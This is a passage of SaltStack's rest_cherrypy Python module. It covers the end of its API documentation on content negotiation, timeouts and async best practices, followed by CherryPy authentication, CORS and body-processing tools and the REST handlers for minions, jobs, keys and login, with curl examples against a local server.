"image": "ami-1624987f",
"delvol_on_destroy", true
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"pkg_|-install_apache_|-httpd_|-installed": {
[...snip full state return here...]
}
}
[...snip other minion returns here...]
},
{
[...snip full salt-cloud output here...]
}
]
}
Content negotiation
-------------------
This REST interface is flexible in what data formats it will accept as well
as what formats it will return (e.g., JSON, YAML, urlencoded).
* Specify the format of data in the request body by including the
:mailheader:`Content-Type` header.
* Specify the desired data format for the response body with the
:mailheader:`Accept` header.
We recommend the JSON format for most HTTP requests. urlencoded data is simple
and cannot express complex data structures -- and that is often required for
some Salt commands, such as starting a state run that uses Pillar data. Salt's
CLI tool can reformat strings passed in at the CLI into complex data
structures, and that behavior also works via salt-api, but that can be brittle
and since salt-api can accept JSON it is best just to send JSON.
Here is an example of sending urlencoded data:
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-d client=runner \\
-d fun='jobs.lookup_jid' \\
-d jid='20150129182456704682'
.. admonition:: urlencoded data caveats
* Only a single command may be sent per HTTP request.
* Repeating the ``arg`` parameter multiple times will cause those
parameters to be combined into a single list.
Note, some popular frameworks and languages (notably jQuery, PHP, and
Ruby on Rails) will automatically append empty brackets onto repeated
query string parameters. E.g., ``?foo[]=fooone&foo[]=footwo``. This is
**not** supported; send ``?foo=fooone&foo=footwo`` instead, or send JSON
or YAML.
A note about ``curl``
The ``-d`` flag to curl does *not* automatically urlencode data which can
affect passwords and other data that contains characters that must be
encoded. Use the ``--data-urlencode`` flag instead. E.g.:
.. code-block:: bash
curl -ksi http://localhost:8000/login \\
-H "Accept: application/json" \\
-d username='myapiuser' \\
--data-urlencode password='1234+' \\
-d eauth='pam'
Performance Expectations and Recommended Usage
==============================================
This module provides a thin wrapper around :ref:`Salt's Python API
<python-api>`. Executing a Salt command via rest_cherrypy is directly analogous
to executing a Salt command via Salt's CLI (which also uses the Python API) --
they share the same semantics, performance characteristics, and 98% of the same
code. As a rule-of-thumb: if you wouldn't do it at the CLI don't do it via this
API.
Long-Running HTTP Connections
-----------------------------
The CherryPy server is a production-ready, threading HTTP server written in
Python. Because it makes use of a thread pool to process HTTP requests it is
not ideally suited to maintaining large numbers of concurrent, synchronous
connections. On moderate hardware with default settings it should top-out at
around 30 to 50 concurrent connections.
That number of long-running, synchronous Salt processes is also not ideal. Like
at the CLI, each Salt command run will start a process that instantiates its
own ``LocalClient``, which instantiates its own listener to the Salt event bus,
and sends out its own periodic ``saltutil.find_job`` queries to determine if a
Minion is still running the command. Not exactly a lightweight operation.
Timeouts
--------
In addition to the above resource overhead for long-running connections, there
are the usual HTTP timeout semantics for the CherryPy server, any HTTP client
being used, as well as any hardware in between such as proxies, gateways, or
load balancers. rest_cherrypy can be configured not to time-out long responses
via the ``expire_responses`` setting, and both :py:class:`LocalClient
<salt.client.LocalClient>` and :py:class:`RunnerClient
<salt.runner.RunnerClient>` have their own timeout parameters that may be
passed as top-level keywords:
.. code-block:: bash
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.sleep",
"kwarg": {"length": 30},
"timeout": 60
},
{
"client": "runner",
"fun": "test.sleep",
"kwarg": {"s_time": 30},
"timeout": 60
}
]
'
Best Practices
--------------
Given the performance overhead and HTTP timeouts for long-running operations
described above, the most effective and most scalable way to use both Salt and
salt-api is to run commands asynchronously using the ``local_async``,
``runner_async``, and ``wheel_async`` clients.
Running async jobs results in being able to process 3x more commands per second
for ``LocalClient`` and 17x more commands per second for ``RunnerClient``, in
addition to much less network traffic and memory requirements. Job returns can
be fetched from Salt's job cache via the ``/jobs/<jid>`` endpoint, or they can
be collected into a data store using Salt's :ref:`Returner system <returners>`.
The ``/events`` endpoint is specifically designed to handle long-running HTTP
connections and it exposes Salt's event bus which includes job returns.
Watching this endpoint first, then executing asynchronous Salt commands second,
is the most lightweight and scalable way to use ``rest_cherrypy`` while still
receiving job returns in real-time. But this requires clients that can properly
handle the inherent asynchronicity of that workflow.
Performance Tuning
------------------
The ``thread_pool`` and ``socket_queue_size`` settings can be used to increase
the capacity of rest_cherrypy to handle incoming requests. Keep an eye on RAM
usage as well as available file handles while testing changes to these
settings. As salt-api is a thin wrapper around Salt's Python API, also keep an
eye on the performance of Salt when testing.
Future Plans
------------
Now that Salt uses the Tornado concurrency library internally, we plan to
improve performance in the API by taking advantage of existing processes and
event listeners and to use lightweight coroutines to facilitate more
simultaneous HTTP connections and better support for synchronous operations.
That effort can be tracked in `issue 26505`__, but until that issue is closed
rest_cherrypy will remain the officially recommended REST API.
.. __: https://github.com/saltstack/salt/issues/26505
.. |req_token| replace:: a session token from :py:class:`~Login`.
.. |req_accept| replace:: the desired response format.
.. |req_ct| replace:: the format of the request body.
.. |res_ct| replace:: the format of the response body; depends on the
:mailheader:`Accept` request header.
.. |200| replace:: success
.. |400| replace:: bad or malformed request
.. |401| replace:: authentication required
.. |406| replace:: requested Content-Type not available
'''
# We need a custom pylintrc here...
# pylint: disable=W0212,E1101,C0103,R0201,W0221,W0613
# Import Python libs
from __future__ import absolute_import
import collections
import itertools
import functools
import logging
import json
import os
import signal
import tarfile
from multiprocessing import Process, Pipe
logger = logging.getLogger(__name__)
# Import third-party libs
# pylint: disable=import-error, 3rd-party-module-not-gated
import cherrypy
try:
from cherrypy.lib import cpstats
except AttributeError:
cpstats = None
logger.warn('Import of cherrypy.cpstats failed. '
'Possible upstream bug: '
'https://github.com/cherrypy/cherrypy/issues/1444')
except ImportError:
cpstats = None
logger.warn('Import of cherrypy.cpstats failed.')
import yaml
# pylint: enable=import-error, 3rd-party-module-not-gated
# Import Salt libs
import salt
import salt.auth
import salt.exceptions
import salt.utils.event
import salt.utils.stringutils
import salt.utils.versions
from salt.ext import six
# Import salt-api libs
import salt.netapi
# Imports related to websocket
try:
from .tools import websockets
from . import event_processor
HAS_WEBSOCKETS = True
except ImportError:
websockets = type('websockets', (object,), {
'SynchronizingWebsocket': None,
})
HAS_WEBSOCKETS = False
def html_override_tool():
'''
Bypass the normal handler and serve HTML for all URLs
The ``app_path`` setting must be non-empty and the request must ask for
``text/html`` in the ``Accept`` header.
'''
apiopts = cherrypy.config['apiopts']
request = cherrypy.request
url_blacklist = (
apiopts.get('app_path', '/app'),
apiopts.get('static_path', '/static'),
)
if 'app' not in cherrypy.config['apiopts']:
return
if request.path_info.startswith(url_blacklist):
return
if request.headers.get('Accept') == '*/*':
return
try:
wants_html = cherrypy.lib.cptools.accept('text/html')
except cherrypy.HTTPError:
return
else:
if wants_html != 'text/html':
return
raise cherrypy.InternalRedirect(apiopts.get('app_path', '/app'))
def salt_token_tool():
'''
If the custom authentication header is supplied, put it in the cookie dict
so the rest of the session-based auth works as intended
'''
x_auth = cherrypy.request.headers.get('X-Auth-Token', None)
# X-Auth-Token header trumps session cookie
if x_auth:
cherrypy.request.cookie['session_id'] = x_auth
def salt_api_acl_tool(username, request):
'''
..versionadded:: 2016.3.0
Verifies user requests against the API whitelist. (User/IP pair)
in order to provide whitelisting for the API similar to the
master, but over the API.
..code-block:: yaml
rest_cherrypy:
api_acl:
users:
'*':
- 1.1.1.1
- 1.1.1.2
foo:
- 8.8.4.4
bar:
- '*'
:param username: Username to check against the API.
:type username: str
:param request: Cherrypy request to check against the API.
:type request: cherrypy.request
'''
failure_str = ("[api_acl] Authentication failed for "
"user {0} from IP {1}")
success_str = ("[api_acl] Authentication sucessful for "
"user {0} from IP {1}")
pass_str = ("[api_acl] Authentication not checked for "
"user {0} from IP {1}")
acl = None
# Salt Configuration
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
# Cherrypy Config.
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
# ACL Config.
acl = cherrypy_conf.get('api_acl', None)
ip = request.remote.ip
if acl:
users = acl.get('users', {})
if users:
if username in users:
if ip in users[username] or '*' in users[username]:
logger.info(success_str.format(username, ip))
return True
else:
logger.info(failure_str.format(username, ip))
return False
elif username not in users and '*' in users:
if ip in users['*'] or '*' in users['*']:
logger.info(success_str.format(username, ip))
return True
else:
logger.info(failure_str.format(username, ip))
return False
else:
logger.info(failure_str.format(username, ip))
return False
else:
logger.info(pass_str.format(username, ip))
return True
def salt_ip_verify_tool():
'''
If there is a list of restricted IPs, verify current
client is coming from one of those IPs.
'''
# This is overly cumbersome and crude,
# But, it's also safe... ish...
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
auth_ip_list = cherrypy_conf.get('authorized_ips', None)
if auth_ip_list:
logger.debug("Found IP list: {0}".format(auth_ip_list))
rem_ip = cherrypy.request.headers.get('Remote-Addr', None)
logger.debug("Request from IP: {0}".format(rem_ip))
if rem_ip not in auth_ip_list:
logger.error("Blocked IP: {0}".format(rem_ip))
raise cherrypy.HTTPError(403, 'Bad IP')
def salt_auth_tool():
'''
Redirect all unauthenticated requests to the login page
'''
# Redirect to the login page if the session hasn't been authed
if 'token' not in cherrypy.session: # pylint: disable=W8601
raise cherrypy.HTTPError(401)
# Session is authenticated; inform caches
cherrypy.response.headers['Cache-Control'] = 'private'
def cors_tool():
'''
Handle both simple and complex CORS requests
Add CORS headers to each response. If the request is a CORS preflight
request swap out the default handler with a simple, single-purpose handler
that verifies the request and provides a valid CORS response.
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
# Always set response headers necessary for 'simple' CORS.
resp_head['Access-Control-Allow-Origin'] = req_head.get('Origin', '*')
resp_head['Access-Control-Expose-Headers'] = 'GET, POST'
resp_head['Access-Control-Allow-Credentials'] = 'true'
# Non-simple CORS preflight request; short-circuit the normal handler.
if cherrypy.request.method == 'OPTIONS':
ac_method = req_head.get('Access-Control-Request-Method', None)
allowed_methods = ['GET', 'POST']
allowed_headers = [
'Content-Type',
'X-Auth-Token',
'X-Requested-With',
]
if ac_method and ac_method in allowed_methods:
resp_head['Access-Control-Allow-Methods'] = ', '.join(allowed_methods)
resp_head['Access-Control-Allow-Headers'] = ', '.join(allowed_headers)
resp_head['Connection'] = 'keep-alive'
resp_head['Access-Control-Max-Age'] = '1400'
# CORS requests should short-circuit the other tools.
cherrypy.response.body = ''
cherrypy.response.status = 200
cherrypy.serving.request.handler = None
# Needed to avoid the auth_tool check.
if cherrypy.request.config.get('tools.sessions.on', False):
cherrypy.session['token'] = True
return True
# Be conservative in what you send
# Maps Content-Type to serialization functions; this is a tuple of tuples to
# preserve order of preference.
ct_out_map = (
('application/json', json.dumps),
('application/x-yaml', functools.partial(
yaml.safe_dump, default_flow_style=False)),
)
def hypermedia_handler(*args, **kwargs):
'''
Determine the best output format based on the Accept header, execute the
regular handler, and transform the output to the request content type (even
if it's an error).
:param args: Pass args through to the main handler
:param kwargs: Pass kwargs through to the main handler
'''
# Execute the real handler. Handle or pass-through any errors we know how
# to handle (auth & HTTP errors). Reformat any errors we don't know how to
# handle as a data structure.
try:
cherrypy.response.processors = dict(ct_out_map)
ret = cherrypy.serving.request._hypermedia_inner_handler(*args, **kwargs)
except (salt.exceptions.EauthAuthenticationError,
salt.exceptions.TokenAuthenticationError):
raise cherrypy.HTTPError(401)
except salt.exceptions.SaltInvocationError:
raise cherrypy.HTTPError(400)
except (salt.exceptions.SaltDaemonNotRunning,
salt.exceptions.SaltReqTimeoutError) as exc:
raise cherrypy.HTTPError(503, exc.strerror)
except salt.exceptions.SaltClientTimeout:
raise cherrypy.HTTPError(504)
except cherrypy.CherryPyException:
raise
except Exception as exc:
# The TimeoutError exception class was removed in CherryPy in 12.0.0, but
# Still check existence of TimeoutError and handle in CherryPy < 12.
# The check was moved down from the SaltClientTimeout error line because
# A one-line if statement throws a BaseException inheritance TypeError.
if hasattr(cherrypy, 'TimeoutError') and isinstance(exc, cherrypy.TimeoutError):
raise cherrypy.HTTPError(504)
import traceback
logger.debug("Error while processing request for: %s",
cherrypy.request.path_info,
exc_info=True)
cherrypy.response.status = 500
ret = {
'status': cherrypy.response.status,
'return': '{0}'.format(traceback.format_exc(exc))
if cherrypy.config['debug']
else "An unexpected error occurred"}
# Raises 406 if requested content-type is not supported
best = cherrypy.lib.cptools.accept([i for (i, _) in ct_out_map])
# Transform the output from the handler into the requested output format
cherrypy.response.headers['Content-Type'] = best
out = cherrypy.response.processors[best]
try:
response = out(ret)
if six.PY3:
response = salt.utils.stringutils.to_bytes(response)
return response
except Exception:
msg = 'Could not serialize the return data from Salt.'
logger.debug(msg, exc_info=True)
raise cherrypy.HTTPError(500, msg)
def hypermedia_out():
'''
Determine the best handler for the requested content type
Wrap the normal handler and transform the output from that handler into the
requested content type
'''
request = cherrypy.serving.request
request._hypermedia_inner_handler = request.handler
# If handler has been explicitly set to None, don't override.
if request.handler is not None:
request.handler = hypermedia_handler
def process_request_body(fn):
'''
A decorator to skip a processor function if process_request_body is False
'''
@functools.wraps(fn)
def wrapped(*args, **kwargs): # pylint: disable=C0111
if cherrypy.request.process_request_body is not False:
fn(*args, **kwargs)
return wrapped
def urlencoded_processor(entity):
'''
Accept x-www-form-urlencoded data (run through CherryPy's formatter)
and reformat it into a Low State data structure.
Since we can't easily represent complicated data structures with
key-value pairs, any more complicated requirements (e.g. compound
commands) must instead be delivered via JSON or YAML.
For example::
.. code-block:: bash
curl -si localhost:8000 -d client=local -d tgt='*' \\
-d fun='test.kwarg' -d arg='one=1' -d arg='two=2'
:param entity: raw POST data
'''
if six.PY3:
# https://github.com/cherrypy/cherrypy/pull/1572
contents = six.StringIO()
entity.fp.read(fp_out=contents)
contents.seek(0)
body_str = contents.read()
body_bytes = salt.utils.stringutils.to_bytes(body_str)
body_bytes = six.BytesIO(body_bytes)
body_bytes.seek(0)
# Patch fp
entity.fp = body_bytes
del contents
# First call out to CherryPy's default processor
cherrypy._cpreqbody.process_urlencoded(entity)
cherrypy._cpreqbody.process_urlencoded(entity)
cherrypy.serving.request.unserialized_data = entity.params
cherrypy.serving.request.raw_body = ''
@process_request_body
def json_processor(entity):
'''
Unserialize raw POST data in JSON format to a Python data structure.
:param entity: raw POST data
'''
if six.PY2:
body = entity.fp.read()
else:
# https://github.com/cherrypy/cherrypy/pull/1572
contents = six.StringIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = contents.read()
del contents
try:
cherrypy.serving.request.unserialized_data = json.loads(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid JSON document')
cherrypy.serving.request.raw_body = body
@process_request_body
def yaml_processor(entity):
'''
Unserialize raw POST data in YAML format to a Python data structure.
:param entity: raw POST data
'''
if six.PY2:
body = entity.fp.read()
else:
# https://github.com/cherrypy/cherrypy/pull/1572
contents = six.StringIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = contents.read()
try:
cherrypy.serving.request.unserialized_data = yaml.safe_load(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid YAML document')
cherrypy.serving.request.raw_body = body
@process_request_body
def text_processor(entity):
'''
Attempt to unserialize plain text as JSON
Some large services still send JSON with a text/plain Content-Type. Those
services are bad and should feel bad.
:param entity: raw POST data
'''
if six.PY2:
body = entity.fp.read()
else:
# https://github.com/cherrypy/cherrypy/pull/1572
contents = six.StringIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = contents.read()
try:
cherrypy.serving.request.unserialized_data = json.loads(body)
except ValueError:
cherrypy.serving.request.unserialized_data = body
cherrypy.serving.request.raw_body = body
def hypermedia_in():
'''
Unserialize POST/PUT data of a specified Content-Type.
The following custom processors all are intended to format Low State data
and will place that data structure into the request object.
:raises HTTPError: if the request contains a Content-Type that we do not
have a processor for
'''
# Be liberal in what you accept
ct_in_map = {
'application/x-www-form-urlencoded': urlencoded_processor,
'application/json': json_processor,
'application/x-yaml': yaml_processor,
'text/yaml': yaml_processor,
'text/plain': text_processor,
}
# Do not process the body for POST requests that have specified no content
# or have not specified Content-Length
if (cherrypy.request.method.upper() == 'POST'
and cherrypy.request.headers.get('Content-Length', '0') == '0'):
cherrypy.request.process_request_body = False
cherrypy.request.unserialized_data = None
cherrypy.request.body.processors.clear()
cherrypy.request.body.default_proc = cherrypy.HTTPError(
406, 'Content type not supported')
cherrypy.request.body.processors = ct_in_map
def lowdata_fmt():
'''
Validate and format lowdata from incoming unserialized request data
This tool requires that the hypermedia_in tool has already been run.
'''
if cherrypy.request.method.upper() != 'POST':
return
data = cherrypy.request.unserialized_data
# if the data was sent as urlencoded, we need to make it a list.
# this is a very forgiving implementation as different clients set different
# headers for form encoded data (including charset or something similar)
if data and isinstance(data, collections.Mapping):
# Make the 'arg' param a list if not already
if 'arg' in data and not isinstance(data['arg'], list):
data['arg'] = [data['arg']]
# Finally, make a Low State and put it in request
cherrypy.request.lowstate = [data]
else:
cherrypy.serving.request.lowstate = data
tools_config = {
'on_start_resource': [
('html_override', html_override_tool),
('salt_token', salt_token_tool),
],
'before_request_body': [
('cors_tool', cors_tool),
('salt_auth', salt_auth_tool),
('hypermedia_in', hypermedia_in),
],
'before_handler': [
('lowdata_fmt', lowdata_fmt),
('hypermedia_out', hypermedia_out),
('salt_ip_verify', salt_ip_verify_tool),
],
}
for hook, tool_list in tools_config.items():
for idx, tool_config in enumerate(tool_list):
tool_name, tool_fn = tool_config
setattr(cherrypy.tools, tool_name, cherrypy.Tool(
hook, tool_fn, priority=(50 + idx)))
###############################################################################
class LowDataAdapter(object):
'''
The primary entry point to Salt's REST API
'''
exposed = True
_cp_config = {
'tools.salt_token.on': True,
'tools.sessions.on': True,
'tools.sessions.timeout': 60 * 10, # 10 hours
# 'tools.autovary.on': True,
'tools.hypermedia_out.on': True,
'tools.hypermedia_in.on': True,
'tools.lowdata_fmt.on': True,
'tools.salt_ip_verify.on': True,
}
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.apiopts = cherrypy.config['apiopts']
self.api = salt.netapi.NetapiClient(self.opts)
def exec_lowstate(self, client=None, token=None):
'''
Pull a Low State data structure from request and execute the low-data
chunks through Salt. The low-data chunks will be updated to include the
authorization token for the current session.
'''
lowstate = cherrypy.request.lowstate
# Release the session lock before executing any potentially
# long-running Salt commands. This allows different threads to execute
# Salt commands concurrently without blocking.
if cherrypy.request.config.get('tools.sessions.on', False):
cherrypy.session.release_lock()
# if the lowstate loaded isn't a list, lets notify the client
if not isinstance(lowstate, list):
raise cherrypy.HTTPError(400, 'Lowstates must be a list')
# Make any requested additions or modifications to each lowstate, then
# execute each one and yield the result.
for chunk in lowstate:
if token:
chunk['token'] = token
if cherrypy.session.get('user'):
chunk['__current_eauth_user'] = cherrypy.session.get('user')
if cherrypy.session.get('groups'):
chunk['__current_eauth_groups'] = cherrypy.session.get('groups')
if client:
chunk['client'] = client
# Make any 'arg' params a list if not already.
# This is largely to fix a deficiency in the urlencoded format.
if 'arg' in chunk and not isinstance(chunk['arg'], list):
chunk['arg'] = [chunk['arg']]
ret = self.api.run(chunk)
# Sometimes Salt gives us a return and sometimes an iterator
if isinstance(ret, collections.Iterator):
for i in ret:
yield i
else:
yield ret
@cherrypy.config(**{'tools.sessions.on': False})
def GET(self):
'''
An explanation of the API with links of where to go next
.. http:get:: /
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000
.. code-block:: http
GET / HTTP/1.1
Host: localhost:8000
Accept: application/json
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
'''
import inspect
return {
'return': "Welcome",
'clients': salt.netapi.CLIENTS,
}
@cherrypy.tools.salt_token()
@cherrypy.tools.salt_auth()
def POST(self, **kwargs):
'''
Send one or more Salt commands in the request body
.. http:post:: /
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body.
**Example request:**
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-H "Content-type: application/json" \\
-d '[{"client": "local", "tgt": "*", "fun": "test.ping"}]'
.. code-block:: http
POST / HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
X-Auth-Token: d40d1e1e
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping"}]
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 200
Allow: GET, HEAD, POST
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
'''
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token')))
}
class Minions(LowDataAdapter):
'''
Convenience URLs for working with minions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_auth.on': True,
})
def GET(self, mid=None):
'''
A convenience URL for getting lists of minions or getting minion
details
.. http:get:: /minions/(mid)
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/minions/ms-3
.. code-block:: http
GET /minions/ms-3 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 129005
Content-Type: application/x-yaml
return:
- ms-3:
grains.items:
...
'''
cherrypy.request.lowstate = [{
'client': 'local', 'tgt': mid or '*', 'fun': 'grains.items',
}]
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token'))),
}
def POST(self, **kwargs):
'''
Start an execution command and immediately return the job id
.. http:post:: /minions
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body. The ``client`` option will be set to
:py:meth:`~salt.client.LocalClient.local_async`.
**Example request:**
.. code-block:: bash
curl -sSi localhost:8000/minions \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-d '[{"tgt": "*", "fun": "status.diskusage"}]'
.. code-block:: http
POST /minions HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Type: application/json
tgt=*&fun=status.diskusage
**Example response:**
.. code-block:: http
HTTP/1.1 202 Accepted
Content-Length: 86
Content-Type: application/x-yaml
return:
- jid: '20130603122505459265'
minions: [ms-4, ms-3, ms-2, ms-1, ms-0]
_links:
jobs:
- href: /jobs/20130603122505459265
'''
job_data = list(self.exec_lowstate(client='local_async',
token=cherrypy.session.get('token')))
cherrypy.response.status = 202
return {
'return': job_data,
'_links': {
'jobs': [{'href': '/jobs/{0}'.format(i['jid'])}
for i in job_data if i],
},
}
class Jobs(LowDataAdapter):
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_auth.on': True,
})
def GET(self, jid=None, timeout=''):
'''
A convenience URL for getting lists of previously run jobs or getting
the return from a single job
.. http:get:: /jobs/(jid)
List jobs or show a single job from the job cache.
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs
.. code-block:: http
GET /jobs HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
- '20121130104633606931':
Arguments:
- '3'
Function: test.fib
Start Time: 2012, Nov 30 10:46:33.606931
Target: jerry
Target-type: glob
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs/20121130104633606931
.. code-block:: http
GET /jobs/20121130104633606931 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
info:
- Arguments:
- '3'
Function: test.fib
Minions:
- jerry
Start Time: 2012, Nov 30 10:46:33.606931
Target: '*'
Target-type: glob
User: saltdev
jid: '20121130104633606931'
return:
- jerry:
- - 0
- 1
- 1
- 2
- 6.9141387939453125e-06
'''
lowstate = {'client': 'runner'}
if jid:
lowstate.update({'fun': 'jobs.list_job', 'jid': jid})
else:
lowstate.update({'fun': 'jobs.list_jobs'})
cherrypy.request.lowstate = [lowstate]
job_ret_info = list(self.exec_lowstate(
token=cherrypy.session.get('token')))
ret = {}
if jid:
ret['info'] = [job_ret_info[0]]
minion_ret = {}
returns = job_ret_info[0].get('Result')
for minion in returns:
if u'return' in returns[minion]:
minion_ret[minion] = returns[minion].get(u'return')
else:
minion_ret[minion] = returns[minion].get('return')
ret['return'] = [minion_ret]
else:
ret['return'] = [job_ret_info[0]]
return ret
class Keys(LowDataAdapter):
'''
Convenience URLs for working with minion keys
.. versionadded:: 2014.7.0
These URLs wrap the functionality provided by the :py:mod:`key wheel
module <salt.wheel.key>` functions.
'''
def GET(self, mid=None):
'''
Show the list of minion keys or detail on a specific key
.. versionadded:: 2014.7.0
.. http:get:: /keys/(mid)
List all keys or show a specific key
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys
.. code-block:: http
GET /keys HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
local:
- master.pem
- master.pub
minions:
- jerry
minions_pre: []
minions_rejected: []
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys/jerry
.. code-block:: http
GET /keys/jerry HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
minions:
jerry: 51:93:b3:d0:9f:3a:6d:e5:28:67:c2:4b:27:d6:cd:2b
'''
if mid:
lowstate = [{
'client': 'wheel',
'fun': 'key.finger',
'match': mid,
}]
else:
lowstate = [{
'client': 'wheel',
'fun': 'key.list_all',
}]
cherrypy.request.lowstate = lowstate
result = self.exec_lowstate(token=cherrypy.session.get('token'))
return {'return': next(result, {}).get('data', {}).get('return', {})}
@cherrypy.config(**{'tools.hypermedia_out.on': False, 'tools.sessions.on': False})
def POST(self, **kwargs):
r'''
Easily generate keys for a minion and auto-accept the new key
Accepts all the same parameters as the :py:func:`key.gen_accept
<salt.wheel.key.gen_accept>`.
.. note:: A note about ``curl``
Avoid using the ``-i`` flag or HTTP headers will be written and
produce an invalid tar file.
Example partial kickstart script to bootstrap a new minion:
.. code-block:: text
%post
mkdir -p /etc/salt/pki/minion
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
| tar -C /etc/salt/pki/minion -xf -
mkdir -p /etc/salt/minion.d
printf 'master: 10.0.0.5\nid: jerry' > /etc/salt/minion.d/id.conf
%end
.. http:post:: /keys
Generate a public and private key and return both as a tarball
Authentication credentials must be passed in the request.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
-o jerry-salt-keys.tar
.. code-block:: http
POST /keys HTTP/1.1
Host: localhost:8000
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 10240
Content-Disposition: attachment; filename="saltkeys-jerry.tar"
Content-Type: application/x-tar
jerry.pub0000644000000000000000000000070300000000000010730 0ustar 00000000000000
'''
lowstate = cherrypy.request.lowstate
lowstate[0].update({
'client': 'wheel',
'fun': 'key.gen_accept',
})
if 'mid' in lowstate[0]:
lowstate[0]['id_'] = lowstate[0].pop('mid')
result = self.exec_lowstate()
ret = next(result, {}).get('data', {}).get('return', {})
pub_key = ret.get('pub', '')
pub_key_file = tarfile.TarInfo('minion.pub')
pub_key_file.size = len(pub_key)
priv_key = ret.get('priv', '')
priv_key_file = tarfile.TarInfo('minion.pem')
priv_key_file.size = len(priv_key)
fileobj = six.StringIO()
tarball = tarfile.open(fileobj=fileobj, mode='w')
tarball.addfile(pub_key_file, six.StringIO(pub_key))
tarball.addfile(priv_key_file, six.StringIO(priv_key))
tarball.close()
headers = cherrypy.response.headers
headers['Content-Disposition'] = 'attachment; filename="saltkeys-{0}.tar"'.format(lowstate[0]['id_'])
headers['Content-Type'] = 'application/x-tar'
headers['Content-Length'] = fileobj.len
headers['Cache-Control'] = 'no-cache'
fileobj.seek(0)
return fileobj
class Login(LowDataAdapter):
'''
Log in to receive a session token
:ref:`Authentication information <rest_cherrypy-auth>`.
'''
def __init__(self, *args, **kwargs):
super(Login, self).__init__(*args, **kwargs)
self.auth = salt.auth.Resolver(self.opts)
def GET(self):
'''
Present the login interface
.. http:get:: /login
An explanation of how to log in.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/login
.. code-block:: http
GET /login HTTP/1.1
Host: localhost:8000
Accept: text/html
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: text/html
'''
cherrypy.response.headers['WWW-Authenticate'] = 'Session'
return {
'status': cherrypy.response.status,
'return': "Please log in",
}
def POST(self, **kwargs):
'''
:ref:`Authenticate <rest_cherrypy-auth>` against Salt's eauth system
.. http:post:: /login
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:form eauth: the eauth backend configured for the user
:form username: username
:form password: password
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -si localhost:8000/login \\
